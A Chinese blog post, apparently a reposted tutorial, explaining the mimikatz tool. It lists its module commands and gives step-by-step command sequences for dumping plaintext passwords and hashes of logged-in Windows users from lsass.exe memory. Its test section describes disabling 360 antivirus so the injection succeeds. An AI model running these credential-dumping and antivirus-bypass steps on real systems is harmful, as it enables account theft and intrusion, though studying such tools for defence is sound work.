轻量级调试器神器 - mimikatz （学习了，很强大的工具）

神器mimikatz使用详解

一.mimikatz简介

 

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器，它具备很多功能，其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。

 

mimikatz的功能不仅如此，它还可以提升进程权限，注入进程，读取进程内存等等，mimikatz包含了很多本地模块，更像是一个轻量级的调试器，其强大的功能还有待挖掘。

作者主页：http://blog.gentilkiwi.com/ 

 

 

二.mimikatz基础命令

 

随便输入”xxx::”，会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在，然后会列出所有可用的命令

 

所有的模块与命令，如下图（左边的是模块名称，右边的是描述）：

 

 

 

1.cls    清屏

 

2.exit    退出

 

3.version    查看mimikatz的版本

 

4.help    查看帮助信息（全是法文，只能找google了）

 

5.system::user    查看当前登录的系统用户

 

6.system::computer    查看计算机名称

 

7.process::list    列出进程

 

8.process::suspend 进程名称    暂停进程

QQ进程还在，只是QQ无法使用了。

 

9.process::stop 进程名称    结束进程

 

10.process::modules    列出系统的核心模块及所在位置

 

11.service::list    列出系统的服务

 

12.service::remove    移除系统的服务

 

13.service::start stop 服务名称    启动或停止服务

 

14.privilege::list    列出权限列表

 

15.privilege::enable    激活一个或多个权限

 

16.privilege::debug    提升权限

 

17.nogpo::cmd    打开系统的cmd.exe

 

18.nogpo::regedit    打开系统的注册表

 

19.nogpo::taskmgr    打开任务管理器

 

20.ts::sessions    显示当前的会话

 

21.ts::processes    显示进程和对应的pid情况等

 

22.sekurlsa::wdigest    获取本地用户信息及密码

 

23.sekurlsa::wdigest    获取kerberos用户信息及密码

 

24.sekurlsa::tspkg   获取tspkg用户信息及密码

 

25.sekurlsa::logonPasswords   获登陆用户信息及密码

 

ps：1.由于命令很多，就不一一列出了。

      2.kerberos是一种网络认证协议。至于tspkg好像是与远程连接时的网络身份认证有关的。

 

 

三:mimikatz获取用户名及密码的方法

方法一：

1. 运行主程序：mimikatz.exe

 

2. 输入：privilege::debug      提升权限

3. 输入：inject::process lsass.exe sekurlsa.dll    将sekurlsa.dll 注入到lsass.exe 中（运行到这一步会出现拒绝访问的提示）

4. 输入：@getLogonPasswords    即可获取hash和当前用户的明文密码！

 

原理就是登陆的时候输入的密码，经过 lsass.exe 里的wdigest和tspkg两个模块调用后，它们对之进行加密处理，而没有进行擦除，

 

而且该加密通过特征可以定位，并且按照微软的算法可逆。 只要登陆过，就可以抓出来，它进行枚举的。

简单地说，在 Windows 中，当用户登录时，lsass.exe 使用一个可逆的算法，加密过的明文密码，并且把密文保存在内存中，没有清理，然后可以抓出来，还原。 

也就是说，开机以后，只要是登陆过的用户，在没重启前（因为重启内存就清零了，这里不包括使用其他方法清理内存），都可以抓出来，注销也是无用的，

 

因为内存中的密码并没有清除，所以还是可以抓出来的。  

方法二（直接调用sekurlsa模块）:(经本人测试有效)

1. 运行主程序：mimikatz.exe
2. 输入：privilege::debug      提升权限

3.输入：sekurlsa::logonPasswords full

 

或

 

 

 

 

四.实际测试

 

一.测试系统：Windows 7旗舰版

测试情况如下图：

 

 

在网上看到一些文章说，安装了360之类的杀毒软件后，神器就无法使用了，于是在本地测试了一下。

无论是启动着360，还是退出了360，都会出来下面的情况。

就是在输入inject::process lsass.exe sekurlsa.dll时提示：拒绝访问(如下图)

后来到进程里看了一下，原来360的主动防御进程还在，。

接着把360的实时防护全部关掉，再把那个进程结束掉就可以正常使用mimikatz了。

 

 

二.测试系统：Windows XP专业版sp3

测试情况如下图：

 

 

三.测试环境：远程连接一台虚拟机中的Windows 7旗舰版

 

 

直接运行mimikatz提权时会提示错误，如下图：

大意是提示权限不足吧。

 

后来用“以管理员身体运行”就可以了

 

 测试情况如下：

 

 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~